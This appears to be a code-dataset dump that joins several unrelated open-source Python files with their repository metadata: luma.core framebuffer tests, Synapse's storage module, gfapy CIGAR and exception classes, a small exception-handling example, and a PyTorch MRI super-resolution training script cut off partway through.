df2.to_csv('xom-topic-dict.csv', sep='|', index=True)
df3 = pd.DataFrame(df.topic_name.unique(), columns=['topic_name'])
df3.index.name = 'topic_id'
df3.to_csv('xom-topic-names.csv', sep='|', index=True)
| 29.842105
| 91
| 0.646384
|
3321520fd39d64663cd400cb5a8cbae3fc043a58
| 4,045
|
py
|
Python
|
tests/test_linux_framebuffer_device.py
|
AlessioMorale/luma.core
|
0b33e512a4ef8c7ae91ccd019bbe9fec0fbdcac6
|
[
"MIT"
] | 114
|
2017-01-13T16:06:46.000Z
|
2022-03-23T23:51:45.000Z
|
tests/test_linux_framebuffer_device.py
|
AlessioMorale/luma.core
|
0b33e512a4ef8c7ae91ccd019bbe9fec0fbdcac6
|
[
"MIT"
] | 192
|
2017-01-12T18:00:00.000Z
|
2022-02-20T22:38:31.000Z
|
tests/test_linux_framebuffer_device.py
|
AlessioMorale/luma.core
|
0b33e512a4ef8c7ae91ccd019bbe9fec0fbdcac6
|
[
"MIT"
] | 58
|
2017-01-21T13:54:03.000Z
|
2022-03-06T15:48:27.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2020 Richard Hull and contributors
# See LICENSE.rst for details.
"""
Tests for the :py:class:`luma.core.device.framebuffer` class.
"""
import os
import pytest
from luma.core.render import canvas
from luma.core.framebuffer import full_frame
from luma.core.device import linux_framebuffer
import luma.core.error
from helpers import multi_mock_open, get_reference_file
from unittest.mock import patch, call
WIDTH = 124
HEIGHT = 55
SCREEN_RES = f"{WIDTH},{HEIGHT}"
BITS_PER_PIXEL = "24"
def swap_red_and_blue(data, step):
arr = bytearray(data)
for i in range(0, len(arr), step):
[red, green, blue] = arr[i: i + 3]
arr[i: i + 3] = [blue, green, red]
return bytes(arr)
def test_display_id_as_dev_fb_number():
with patch("builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)):
device = linux_framebuffer("/dev/fb9")
assert device.id == 9
def test_display_id_from_environ():
os.environ["FRAMEBUFFER"] = "/dev/fb16"
with patch("builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)):
device = linux_framebuffer()
assert device.id == 16
def test_unknown_display_id():
with patch("builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)):
with pytest.raises(luma.core.error.DeviceNotFoundError):
linux_framebuffer("invalid fb")
def test_read_screen_resolution():
with patch(
"builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)
) as fake_open:
device = linux_framebuffer("/dev/fb1")
assert device.width == 124
assert device.height == 55
fake_open.assert_has_calls([call("/sys/class/graphics/fb1/virtual_size", "r")])
def test_read_bits_per_pixel():
with patch(
"builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)
) as fake_open:
device = linux_framebuffer("/dev/fb1")
assert device.bits_per_pixel == 24
fake_open.assert_has_calls(
[call("/sys/class/graphics/fb1/bits_per_pixel", "r")]
)
@pytest.mark.parametrize("bits_per_pixel,bgr", [
(16, False),
(24, False),
(24, True),
(32, False),
(32, True),
])
def test_display(bits_per_pixel, bgr):
bytes_per_pixel = bits_per_pixel // 8
with open(get_reference_file(f"fb_{bits_per_pixel}bpp.raw"), "rb") as fp:
reference = fp.read()
if bgr:
reference = swap_red_and_blue(reference, step=bytes_per_pixel)
with patch("builtins.open", multi_mock_open(SCREEN_RES, str(bits_per_pixel), None)) as fake_open:
device = linux_framebuffer("/dev/fb1", framebuffer=full_frame(), bgr=bgr)
fake_open.assert_has_calls([call("/dev/fb1", "wb")])
fake_open.reset_mock()
with canvas(device, dither=True) as draw:
draw.rectangle((0, 0, 64, 32), fill="red")
draw.rectangle((64, 0, 128, 32), fill="yellow")
draw.rectangle((0, 32, 64, 64), fill="orange")
draw.rectangle((64, 32, 128, 64), fill="white")
fake_open.return_value.seek.assert_has_calls([
call(n * WIDTH * bytes_per_pixel)
for n in range(HEIGHT)
])
fake_open.return_value.write.assert_has_calls([
call(reference[n:n + (WIDTH * bytes_per_pixel)])
for n in range(0, len(reference), WIDTH * bytes_per_pixel)
])
fake_open.return_value.flush.assert_called_once()
def test_unsupported_bit_depth():
with patch("builtins.open", multi_mock_open(SCREEN_RES, "19", None)):
with pytest.raises(AssertionError) as ex:
linux_framebuffer("/dev/fb4")
assert str(ex.value) == 'Unsupported bit-depth: 19'
def test_cleanup():
with patch("builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)) as fake_open:
device = linux_framebuffer("/dev/fb1", framebuffer=full_frame())
device.cleanup()
fake_open.return_value.close.assert_called_once()
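# Hedged addition (not in the original test module): the per-row offset
# arithmetic asserted in test_display, checked directly against the module
# constants for the 24 bpp case (3 bytes per pixel).
def test_row_offsets_are_contiguous():
    bytes_per_pixel = 3
    offsets = [n * WIDTH * bytes_per_pixel for n in range(HEIGHT)]
    assert offsets[0] == 0
    assert all(b - a == WIDTH * bytes_per_pixel for a, b in zip(offsets, offsets[1:]))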
| 32.886179
| 101
| 0.663535
|
fe936b3e6204308d29cdc786cee47c710713c3df
| 10,969
|
py
|
Python
|
synapse/storage/__init__.py
|
xsteadfastx/synapse
|
9a8ae6f1bf833b58416fae1add1972ac3e9d2d59
|
[
"Apache-2.0"
] | 1
|
2017-02-03T18:58:29.000Z
|
2017-02-03T18:58:29.000Z
|
synapse/storage/__init__.py
|
xsteadfastx/synapse
|
9a8ae6f1bf833b58416fae1add1972ac3e9d2d59
|
[
"Apache-2.0"
] | null | null | null |
synapse/storage/__init__.py
|
xsteadfastx/synapse
|
9a8ae6f1bf833b58416fae1add1972ac3e9d2d59
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import defer
from synapse.storage.devices import DeviceStore
from .appservice import (
ApplicationServiceStore, ApplicationServiceTransactionStore
)
from ._base import LoggingTransaction
from .directory import DirectoryStore
from .events import EventsStore
from .presence import PresenceStore, UserPresenceState
from .profile import ProfileStore
from .registration import RegistrationStore
from .room import RoomStore
from .roommember import RoomMemberStore
from .stream import StreamStore
from .transactions import TransactionStore
from .keys import KeyStore
from .event_federation import EventFederationStore
from .pusher import PusherStore
from .push_rule import PushRuleStore
from .media_repository import MediaRepositoryStore
from .rejections import RejectionsStore
from .event_push_actions import EventPushActionsStore
from .deviceinbox import DeviceInboxStore
from .state import StateStore
from .signatures import SignatureStore
from .filtering import FilteringStore
from .end_to_end_keys import EndToEndKeyStore
from .receipts import ReceiptsStore
from .search import SearchStore
from .tags import TagsStore
from .account_data import AccountDataStore
from .openid import OpenIdStore
from .client_ips import ClientIpStore
from .util.id_generators import IdGenerator, StreamIdGenerator, ChainedIdGenerator
from .engines import PostgresEngine
from synapse.api.constants import PresenceState
from synapse.util.caches.stream_change_cache import StreamChangeCache
import logging
logger = logging.getLogger(__name__)
class DataStore(RoomMemberStore, RoomStore,
RegistrationStore, StreamStore, ProfileStore,
PresenceStore, TransactionStore,
DirectoryStore, KeyStore, StateStore, SignatureStore,
ApplicationServiceStore,
EventFederationStore,
MediaRepositoryStore,
RejectionsStore,
FilteringStore,
PusherStore,
PushRuleStore,
ApplicationServiceTransactionStore,
EventsStore,
ReceiptsStore,
EndToEndKeyStore,
SearchStore,
TagsStore,
AccountDataStore,
EventPushActionsStore,
OpenIdStore,
ClientIpStore,
DeviceStore,
DeviceInboxStore,
):
def __init__(self, db_conn, hs):
self.hs = hs
self._clock = hs.get_clock()
self.database_engine = hs.database_engine
self._stream_id_gen = StreamIdGenerator(
db_conn, "events", "stream_ordering",
extra_tables=[("local_invites", "stream_id")]
)
self._backfill_id_gen = StreamIdGenerator(
db_conn, "events", "stream_ordering", step=-1,
extra_tables=[("ex_outlier_stream", "event_stream_ordering")]
)
self._receipts_id_gen = StreamIdGenerator(
db_conn, "receipts_linearized", "stream_id"
)
self._account_data_id_gen = StreamIdGenerator(
db_conn, "account_data_max_stream_id", "stream_id"
)
self._presence_id_gen = StreamIdGenerator(
db_conn, "presence_stream", "stream_id"
)
self._device_inbox_id_gen = StreamIdGenerator(
db_conn, "device_max_stream_id", "stream_id"
)
self._public_room_id_gen = StreamIdGenerator(
db_conn, "public_room_list_stream", "stream_id"
)
self._transaction_id_gen = IdGenerator(db_conn, "sent_transactions", "id")
self._state_groups_id_gen = IdGenerator(db_conn, "state_groups", "id")
self._access_tokens_id_gen = IdGenerator(db_conn, "access_tokens", "id")
self._event_reports_id_gen = IdGenerator(db_conn, "event_reports", "id")
self._push_rule_id_gen = IdGenerator(db_conn, "push_rules", "id")
self._push_rules_enable_id_gen = IdGenerator(db_conn, "push_rules_enable", "id")
self._push_rules_stream_id_gen = ChainedIdGenerator(
self._stream_id_gen, db_conn, "push_rules_stream", "stream_id"
)
self._pushers_id_gen = StreamIdGenerator(
db_conn, "pushers", "id",
extra_tables=[("deleted_pushers", "stream_id")],
)
if isinstance(self.database_engine, PostgresEngine):
self._cache_id_gen = StreamIdGenerator(
db_conn, "cache_invalidation_stream", "stream_id",
)
else:
self._cache_id_gen = None
events_max = self._stream_id_gen.get_current_token()
event_cache_prefill, min_event_val = self._get_cache_dict(
db_conn, "events",
entity_column="room_id",
stream_column="stream_ordering",
max_value=events_max,
)
self._events_stream_cache = StreamChangeCache(
"EventsRoomStreamChangeCache", min_event_val,
prefilled_cache=event_cache_prefill,
)
self._membership_stream_cache = StreamChangeCache(
"MembershipStreamChangeCache", events_max,
)
account_max = self._account_data_id_gen.get_current_token()
self._account_data_stream_cache = StreamChangeCache(
"AccountDataAndTagsChangeCache", account_max,
)
self._presence_on_startup = self._get_active_presence(db_conn)
presence_cache_prefill, min_presence_val = self._get_cache_dict(
db_conn, "presence_stream",
entity_column="user_id",
stream_column="stream_id",
max_value=self._presence_id_gen.get_current_token(),
)
self.presence_stream_cache = StreamChangeCache(
"PresenceStreamChangeCache", min_presence_val,
prefilled_cache=presence_cache_prefill
)
push_rules_prefill, push_rules_id = self._get_cache_dict(
db_conn, "push_rules_stream",
entity_column="user_id",
stream_column="stream_id",
max_value=self._push_rules_stream_id_gen.get_current_token()[0],
)
self.push_rules_stream_cache = StreamChangeCache(
"PushRulesStreamChangeCache", push_rules_id,
prefilled_cache=push_rules_prefill,
)
max_device_inbox_id = self._device_inbox_id_gen.get_current_token()
device_inbox_prefill, min_device_inbox_id = self._get_cache_dict(
db_conn, "device_inbox",
entity_column="user_id",
stream_column="stream_id",
max_value=max_device_inbox_id
)
self._device_inbox_stream_cache = StreamChangeCache(
"DeviceInboxStreamChangeCache", min_device_inbox_id,
prefilled_cache=device_inbox_prefill,
)
        # The federation outbox and the local device inbox use the same
# stream_id generator.
device_outbox_prefill, min_device_outbox_id = self._get_cache_dict(
db_conn, "device_federation_outbox",
entity_column="destination",
stream_column="stream_id",
max_value=max_device_inbox_id,
)
self._device_federation_outbox_stream_cache = StreamChangeCache(
"DeviceFederationOutboxStreamChangeCache", min_device_outbox_id,
prefilled_cache=device_outbox_prefill,
)
cur = LoggingTransaction(
db_conn.cursor(),
name="_find_stream_orderings_for_times_txn",
database_engine=self.database_engine,
after_callbacks=[]
)
self._find_stream_orderings_for_times_txn(cur)
cur.close()
self.find_stream_orderings_looping_call = self._clock.looping_call(
self._find_stream_orderings_for_times, 60 * 60 * 1000
)
self._stream_order_on_start = self.get_room_max_stream_ordering()
self._min_stream_order_on_start = self.get_room_min_stream_ordering()
super(DataStore, self).__init__(hs)
def take_presence_startup_info(self):
active_on_startup = self._presence_on_startup
self._presence_on_startup = None
return active_on_startup
def _get_active_presence(self, db_conn):
"""Fetch non-offline presence from the database so that we can register
the appropriate time outs.
"""
sql = (
"SELECT user_id, state, last_active_ts, last_federation_update_ts,"
" last_user_sync_ts, status_msg, currently_active FROM presence_stream"
" WHERE state != ?"
)
sql = self.database_engine.convert_param_style(sql)
txn = db_conn.cursor()
txn.execute(sql, (PresenceState.OFFLINE,))
rows = self.cursor_to_dict(txn)
txn.close()
for row in rows:
row["currently_active"] = bool(row["currently_active"])
return [UserPresenceState(**row) for row in rows]
@defer.inlineCallbacks
def count_daily_users(self):
"""
Counts the number of users who used this homeserver in the last 24 hours.
"""
def _count_users(txn):
txn.execute(
"SELECT COUNT(DISTINCT user_id) AS users"
" FROM user_ips"
" WHERE last_seen > ?",
# This is close enough to a day for our purposes.
(int(self._clock.time_msec()) - (1000 * 60 * 60 * 24),)
)
rows = self.cursor_to_dict(txn)
if rows:
return rows[0]["users"]
return 0
ret = yield self.runInteraction("count_users", _count_users)
defer.returnValue(ret)
def get_user_ip_and_agents(self, user):
return self._simple_select_list(
table="user_ips",
keyvalues={"user_id": user.to_string()},
retcols=[
"access_token", "ip", "user_agent", "last_seen"
],
desc="get_user_ip_and_agents",
)
def are_all_users_on_domain(txn, database_engine, domain):
sql = database_engine.convert_param_style(
"SELECT COUNT(*) FROM users WHERE name NOT LIKE ?"
)
pat = "%:" + domain
txn.execute(sql, (pat,))
num_not_matching = txn.fetchall()[0][0]
    return num_not_matching == 0
| 36.808725
| 88
| 0.661865
|
afb66732b50ea5ef937c0de962a4a54c0989865f
| 334
|
py
|
Python
|
noise/exceptions.py
|
jarret/noiseprotocol
|
e737e159b5c836ff03e4dc93ac386a4e7d610ec8
|
[
"MIT"
] | 169
|
2017-09-12T20:43:39.000Z
|
2022-03-20T15:23:31.000Z
|
noise/exceptions.py
|
jarret/noiseprotocol
|
e737e159b5c836ff03e4dc93ac386a4e7d610ec8
|
[
"MIT"
] | 32
|
2017-09-13T11:03:12.000Z
|
2021-06-23T15:25:40.000Z
|
noise/exceptions.py
|
jarret/noiseprotocol
|
e737e159b5c836ff03e4dc93ac386a4e7d610ec8
|
[
"MIT"
] | 18
|
2018-03-15T19:28:51.000Z
|
2021-11-01T18:59:20.000Z
|
class NoiseProtocolNameError(Exception):
pass
class NoisePSKError(Exception):
pass
class NoiseValueError(Exception):
pass
class NoiseHandshakeError(Exception):
pass
class NoiseInvalidMessage(Exception):
pass
class NoiseMaxNonceError(Exception):
pass
class NoiseValidationError(Exception):
pass
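# Hedged usage sketch (not part of the original module): these are plain
# Exception subclasses, so callers raise and catch them by name. The error
# message below is purely illustrative.
def _example_handling():
    try:
        raise NoiseMaxNonceError("nonce counter would exceed 2**64 - 1")
    except NoiseMaxNonceError as err:
        return str(err)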
| 12.37037
| 40
| 0.754491
|
5a1e13b6ea2d32000c0a57b166817c1250cc1df3
| 237
|
py
|
Python
|
Advance_Python/Exception_Handling/Catching_Specific_Exception.py
|
siddharth-143/Python
|
293f4643a3a13e3b82d23fd8922db54dbb0f12bc
|
[
"MIT"
] | null | null | null |
Advance_Python/Exception_Handling/Catching_Specific_Exception.py
|
siddharth-143/Python
|
293f4643a3a13e3b82d23fd8922db54dbb0f12bc
|
[
"MIT"
] | null | null | null |
Advance_Python/Exception_Handling/Catching_Specific_Exception.py
|
siddharth-143/Python
|
293f4643a3a13e3b82d23fd8922db54dbb0f12bc
|
[
"MIT"
] | null | null | null |
# Catching Specific Exception
try:
a = int(input("Enter a : "))
b = int(input("Enter b : "))
c = a / b
print(c)
except ZeroDivisionError:
print("division by zero")
except NameError:
print("name is not defined")
| 18.230769
| 32
| 0.611814
|
236f56ebee647da1e638c0c765b9af34368035f1
| 6,025
|
py
|
Python
|
gfapy/alignment/cigar.py
|
ujjwalsh/gfapy
|
891ef3df695f20c67809e5a54549c876d90690b4
|
[
"ISC"
] | 44
|
2017-03-18T08:08:04.000Z
|
2021-11-10T16:11:15.000Z
|
gfapy/alignment/cigar.py
|
ujjwalsh/gfapy
|
891ef3df695f20c67809e5a54549c876d90690b4
|
[
"ISC"
] | 22
|
2017-04-04T21:20:31.000Z
|
2022-03-09T19:05:30.000Z
|
gfapy/alignment/cigar.py
|
ujjwalsh/gfapy
|
891ef3df695f20c67809e5a54549c876d90690b4
|
[
"ISC"
] | 5
|
2017-07-07T02:56:56.000Z
|
2020-09-30T20:10:49.000Z
|
import re
import gfapy
class CIGAR(list):
"""
Representation of the contents of a CIGAR string.
Each operation is represented by a
:class:`CIGAR.Operation <gfapy.alignment.cigar.CIGAR.Operation>`,
which specifies an operation length and operation symbol.
Instances are usually created from their string representations, using the
:class:`~gfapy.alignment.alignment.Alignment` factory class constructor.
Warning:
Although the GFA1 specification does not forbid the
operation symbols NSHX=, these are not allowed in GFA2
and thus their use in GFA1 is discouraged.
"""
def complement(self):
"""The CIGAR when switching the role of the two aligned segments.
Example:
>>> import gfapy
>>> str(gfapy.Alignment("2M1D3M").complement())
'3M1I2M'
Returns:
CIGAR: the complement CIGAR
"""
comp = list(reversed(self))
for op in comp:
if op.code == "I": op.code = "D"
elif op.code == "S": op.code = "D"
elif op.code == "D": op.code = "I"
elif op.code == "N": op.code = "I"
return CIGAR(comp)
def validate(self, version = "gfa1"):
"""Validates the instance.
Parameters:
version (str): 'gfa1' or 'gfa2'
Raises:
~gfapy.error.VersionError: If a wrong **version** is specified.
~gfapy.error.TypeError: If a component of the list is not a
CIGAR Operation; If the CIGAR operation length is not an integer or
a string representing an integer.
~gfapy.error.ValueError: If the length of an operation is < 0; If an
operation code is invalid in general or for the specified GFA version.
"""
if version != "gfa1" and version != "gfa2":
raise gfapy.VersionError(
"Version error: {}".format(repr(version)))
for op in self:
if not isinstance(op, gfapy.CIGAR.Operation):
raise gfapy.TypeError(
"Element is not a CIGAR operation: {}\n".format(op)+
"CIGAR instance is invalid: {}".format(self))
op.validate(version = version)
def length_on_reference(self):
"""Length of the aligned substring on the reference sequence
(**from** sequence for GFA1 links/containments;
**sid1** sequence for GFA2 edges)
Returns:
int
"""
l = 0
for op in self:
if op.code in ["M", "=", "X", "D" , "N"]:
l += op.length
return l
def length_on_query(self):
"""
    Length of the aligned substring on the query sequence
(**to** sequence for GFA1 links/containments;
**sid2** sequence for GFA2 edges)
Returns:
int
"""
l = 0
for op in self:
if op.code in ["M", "=", "X", "I", "S"]:
l += op.length
return l
@classmethod
def _from_string(cls, string, valid = False, version = "gfa1"):
"""Create a CIGAR instance from its string representation.
Parameters:
string (str)
valid (bool): If **True** the string is guaranteed to be valid.
(Defaults to **False**)
version (str): 'gfa1' or 'gfa2'
Returns:
~gfapy.alignment.cigar.CIGAR or
~gfapy.alignment.placeholder.AlignmentPlaceholder
Raises:
~gfapy.error.FormatError: If the string is not a valid CIGAR string.
"""
if string == "*":
return gfapy.AlignmentPlaceholder()
cigar = CIGAR()
if not valid:
if version == "gfa1":
if not re.match(r"^([0-9]+[MIDNSHPX=])+$", string):
raise gfapy.FormatError()
elif version == "gfa2":
if not re.match(r"^([0-9]+[MIDP])+$", string):
raise gfapy.FormatError()
for m in re.finditer("([0-9]+)([MIDNSHPX=])", string):
cigar.append(CIGAR.Operation(int(m.group(1)), m.group(2)))
return cigar
def __str__(self):
if not self:
return "*"
else:
return "".join([str(op) for op in self])
def __repr__(self):
return "gfapy.CIGAR([{}])".format(", ".join([repr(op) for op in self]))
class Operation:
"""An operation in a CIGAR string.
Attributes:
~Operation.length (int): Operation length.
code (str): Operation code, one of
:attr:`~Operation.CODE`.
"""
CODE_GFA1_ONLY = ["S", "H", "N", "X", "="]
"""Operations only valid in GFA1"""
CODE_GFA1_GFA2 = ["M", "I", "D", "P"]
"""Operations valid in GFA1 and GFA2"""
CODE = CODE_GFA1_ONLY + CODE_GFA1_GFA2
"""CIGAR operation codes"""
def validate(self, version = "gfa1"):
"""Validates the CIGAR operation.
Parameters:
version (str): 'gfa1' or 'gfa2'
Raises:
~gfapy.error.VersionError: If a wrong **version** is specified.
~gfapy.error.TypeError: If the CIGAR operation length is not an integer
or a string representing an integer.
~gfapy.error.ValueError: If the length of an operation is < 0; If an
operation code is invalid in general or for the specified GFA
version.
"""
if version != "gfa1" and version != "gfa2":
raise gfapy.VersionError(
"Version error: {}".format(repr(version)))
if not isinstance(self.length, int) and not isinstance(self.length, str):
raise gfapy.TypeError(
"Type error: length of CIGAR is {}".format(self.length))
if(int(self.length) < 0):
raise gfapy.ValueError("Length of CIGAR is {}".format(self.length))
if version == "gfa2":
if not self.code in Operation.CODE_GFA1_GFA2:
raise gfapy.ValueError()
else:
if not self.code in Operation.CODE:
raise gfapy.ValueError()
def __init__(self, length, code):
self.length = length
self.code = code
def __len__(self):
return self.length
def __str__(self):
return "{}{}".format(self.length, self.code)
def __repr__(self):
return "gfapy.CIGAR.Operation({},{})".format(self.length, repr(self.code))
def __eq__(self, other):
return self.length == other.length and self.code == other.code
Operation = CIGAR.Operation
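# Hedged usage sketch (not part of the original module): parse a CIGAR through
# the gfapy.Alignment factory mentioned in the class docstring, then query both
# lengths. For "2M1D3M", M and D advance the reference (2 + 1 + 3 = 6) while
# only M advances the query here (2 + 3 = 5).
def _example_cigar_lengths():  # pragma: no cover
  cigar = gfapy.Alignment("2M1D3M")
  return cigar.length_on_reference(), cigar.length_on_query()  # (6, 5)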
| 30.583756
| 80
| 0.61195
|
bcdf6c107a02f1ed779b37f4bb97ea803fc3024d
| 14,947
|
py
|
Python
|
train.py
|
bryanlimy/mri-super-resolution
|
9aa846dc3ee817b0188518b1fd0effe1fd33e043
|
[
"MIT"
] | 3
|
2021-04-20T11:22:46.000Z
|
2021-05-15T08:40:45.000Z
|
train.py
|
bryanlimy/mri-super-resolution
|
9aa846dc3ee817b0188518b1fd0effe1fd33e043
|
[
"MIT"
] | 1
|
2021-10-14T09:14:57.000Z
|
2021-10-14T10:40:31.000Z
|
train.py
|
bryanlimy/mri-super-resolution
|
9aa846dc3ee817b0188518b1fd0effe1fd33e043
|
[
"MIT"
] | 1
|
2021-05-15T08:40:55.000Z
|
2021-05-15T08:40:55.000Z
|
import torch
import argparse
import numpy as np
from time import time
from tqdm import tqdm
from pathlib import Path
from shutil import rmtree
import torch.optim as optim
import torch.nn.functional as F
from torch.optim.lr_scheduler import StepLR
from torch.cuda.amp import autocast, GradScaler
from slowMRI.utils import utils
from slowMRI.metrics import metrics
from slowMRI.critic.critic import Critic
from slowMRI.models.registry import get_model
from slowMRI.utils.tensorboard import Summary
from slowMRI.data_loader.data_loader import get_loaders
from slowMRI.data_loader.data_handling import SliceUpsampler
def step(args,
model,
inputs,
targets=None,
optimizer=None,
loss_function=None,
scaler=None,
critic=None,
training: bool = False):
""" batch inputs and targets into args.batch_size """
outputs = torch.zeros_like(targets,
dtype=targets.dtype,
device=targets.device,
requires_grad=False)
if training:
model.train()
else:
model.eval()
results = {}
for i in range(0, inputs.shape[0], args.batch_size):
x = inputs[i:i + args.batch_size]
y = None if targets is None else targets[i:i + args.batch_size]
loss = torch.tensor(0.0, requires_grad=True)
with autocast(enabled=args.mixed_precision):
logits = model(x)
y_pred = F.sigmoid(logits) if args.output_logits else logits
if loss_function is not None:
loss = loss_function(logits, y)
utils.update_dict(results, {'Loss': loss.detach()})
outputs[i:i + args.batch_size] = y_pred.detach()
critic_score = torch.tensor(0.0, requires_grad=True)
if critic is not None:
if y is not None:
if training:
critic_results = critic.train(y.detach(), y_pred.detach())
else:
critic_results = critic.validate(y.detach(), y_pred.detach())
utils.update_dict(results, critic_results)
if args.critic_loss > 0:
critic_score = critic.predict(y_pred)
total_loss = loss + args.critic_loss * (1 - critic_score)
utils.update_dict(results, {'Loss/total_loss': total_loss})
if optimizer is not None:
optimizer.zero_grad()
scaler.scale(total_loss).backward()
scaler.step(optimizer)
scaler.update()
if loss_function is None:
return outputs
else:
results = {k: torch.stack(v).mean() for k, v in results.items()}
return outputs, results
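# Hedged illustration (not part of the original training code): the slicing
# pattern used by step() above, shown on a toy 1-D tensor so the chunk sizes
# are easy to verify; only torch from the imports above is needed.
def _demo_minibatch_slicing(batch_size=4):  # pragma: no cover
  data = torch.arange(10)
  chunks = [data[i:i + batch_size] for i in range(0, data.shape[0], batch_size)]
  return [len(c) for c in chunks]  # [4, 4, 2] -- the final slice is shorter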
def train(args,
model,
data,
optimizer,
loss_function,
scaler,
summary,
epoch: int = 0,
critic=None) -> dict:
results = {}
for inputs, targets in tqdm(data, desc='Train'):
inputs = torch.flatten(inputs, end_dim=1)
targets = torch.flatten(targets, end_dim=1)
inputs, targets = inputs.to(args.device), targets.to(args.device)
outputs, step_results = step(args,
model,
inputs,
targets=targets,
optimizer=optimizer,
loss_function=loss_function,
scaler=scaler,
critic=critic,
training=True)
utils.update_dict(results, step_results)
utils.update_dict(results, {'NMSE': metrics.nmse(outputs, targets)})
args.global_step += 1
if args.dry_run:
break
for key, value in results.items():
results[key] = torch.stack(value).mean()
summary.scalar(key, results[key], step=epoch, mode=0)
return results
def validate(args,
model,
data,
loss_function,
summary,
epoch: int = 0,
critic=None) -> dict:
samples, results = None, {}
with torch.no_grad():
for inputs, targets in tqdm(data, desc='Validation'):
inputs = torch.flatten(inputs, end_dim=1)
targets = torch.flatten(targets, end_dim=1)
inputs, targets = inputs.to(args.device), targets.to(args.device)
outputs, step_results = step(args,
model,
inputs,
targets=targets,
loss_function=loss_function,
critic=critic,
training=False)
utils.update_dict(results, step_results)
utils.update_dict(
results, {
'MAE': metrics.mae(outputs, targets),
'NMSE': metrics.nmse(outputs, targets),
'PSNR': metrics.psnr(outputs, targets),
'SSIM': metrics.ssim(outputs, targets)
})
# store samples to plot
if samples is None:
samples = {'inputs': inputs, 'targets': targets, 'outputs': outputs}
for key, value in results.items():
results[key] = torch.stack(value).mean()
summary.scalar(key, results[key], step=epoch, mode=1)
if (epoch % 10 == 0) or (epoch + 1 == args.epochs):
summary.plot_side_by_side('side_by_side',
samples,
random_patches=True,
step=epoch,
mode=1)
summary.plot_difference_maps('diff_maps',
samples,
random_patches=True,
step=epoch,
mode=1)
return results
def test(args,
model,
data,
loss_function,
summary,
epoch: int = 0,
critic=None) -> dict:
model.eval()
slice_upsampler = SliceUpsampler(args,
model,
stride=args.upsampler_stride,
loss_function=loss_function,
critic=critic)
results = {}
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(tqdm(data, desc='Test')):
# shape (batch, slices, channels, height, width)
inputs, targets = inputs.to(args.device), targets.to(args.device)
# select middle slice to up-sample
samples, result = slice_upsampler.upsample_batch(
lr_scans=inputs, hr_scans=targets, slice_idx=inputs.shape[1] // 2)
utils.update_dict(results, result)
summary.plot_side_by_side(f'stitched/batch_#{batch_idx+1:02d}',
samples,
random_patches=False,
step=epoch,
mode=2)
for key, value in results.items():
results[key] = torch.stack(value).mean()
summary.scalar(key, results[key], step=epoch, mode=2)
print(f'Test\t\tLoss: {results["Loss"]:.04f}\t'
f'MAE: {results["MAE"]:.4f}\t'
f'PSNR: {results["PSNR"]:.02f}\t'
f'SSIM: {results["SSIM"]:.04f}\n')
utils.save_csv(filename=args.output_dir / 'test_results.csv', data=results)
return results
def main(args):
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# delete args.output_dir if the flag is set and the directory exists
if args.clear_output_dir and args.output_dir.exists():
rmtree(args.output_dir)
args.output_dir.mkdir(parents=True, exist_ok=True)
args.checkpoint_dir = args.output_dir / 'checkpoints'
args.checkpoint_dir.mkdir(parents=True, exist_ok=True)
args.cuda = not args.no_cuda and torch.cuda.is_available()
args.device = torch.device("cuda" if args.cuda else "cpu")
train_loader, val_loader, test_loader = get_loaders(args)
summary = Summary(args)
scaler = GradScaler(enabled=args.mixed_precision)
args.output_logits = (args.loss in ['bce', 'binarycrossentropy'] and
args.model != 'identity')
model = get_model(args, summary)
if args.weights_dir is not None:
model = utils.load_weights(args, model)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
scheduler = StepLR(optimizer,
step_size=5,
gamma=args.gamma,
verbose=args.verbose == 2)
loss_function = utils.get_loss_function(name=args.loss)
critic = None if args.critic is None else Critic(args, summary=summary)
utils.save_args(args)
args.global_step = 0
for epoch in range(args.epochs):
print(f'Epoch {epoch + 1:03d}/{args.epochs:03d}')
start = time()
train_results = train(args,
model=model,
data=train_loader,
optimizer=optimizer,
loss_function=loss_function,
scaler=scaler,
summary=summary,
epoch=epoch,
critic=critic)
val_results = validate(args,
model=model,
data=val_loader,
loss_function=loss_function,
summary=summary,
epoch=epoch,
critic=critic)
end = time()
scheduler.step()
summary.scalar('elapse', end - start, step=epoch, mode=0)
summary.scalar('lr', scheduler.get_last_lr()[0], step=epoch, mode=0)
summary.scalar('gradient_scale', scaler.get_scale(), step=epoch, mode=0)
print(f'Train\t\tLoss: {train_results["Loss"]:.04f}\n'
f'Validation\tLoss: {val_results["Loss"]:.04f}\t'
f'MAE: {val_results["MAE"]:.04f}\t'
f'PSNR: {val_results["PSNR"]:.02f}\t'
f'SSIM: {val_results["SSIM"]:.04f}\n')
utils.save_model(args, model)
test(args,
model=model,
data=test_loader,
loss_function=loss_function,
summary=summary,
epoch=args.epochs,
critic=critic)
summary.close()
if __name__ == '__main__':
# Training settings
parser = argparse.ArgumentParser(description='Bryan GAN')
parser.add_argument('--input_dir', type=str, help='path to dataset')
parser.add_argument('--output_dir',
type=str,
default='runs',
help='directory to write TensorBoard summary.')
parser.add_argument('--model',
type=str,
default='simple_cnn',
help='model to use')
parser.add_argument('--critic',
type=str,
default=None,
help='adversarial loss to use.')
parser.add_argument('--critic_steps',
type=int,
default=1,
help='number of update steps for critic per global step')
parser.add_argument('--critic_loss',
type=float,
default=0.0,
help='critic loss coefficient to the training objective')
parser.add_argument('--weights_dir',
type=str,
default=None,
help='path to directory to load model weights from')
parser.add_argument('--num_filters',
type=int,
default=64,
help='number of filters or hidden units')
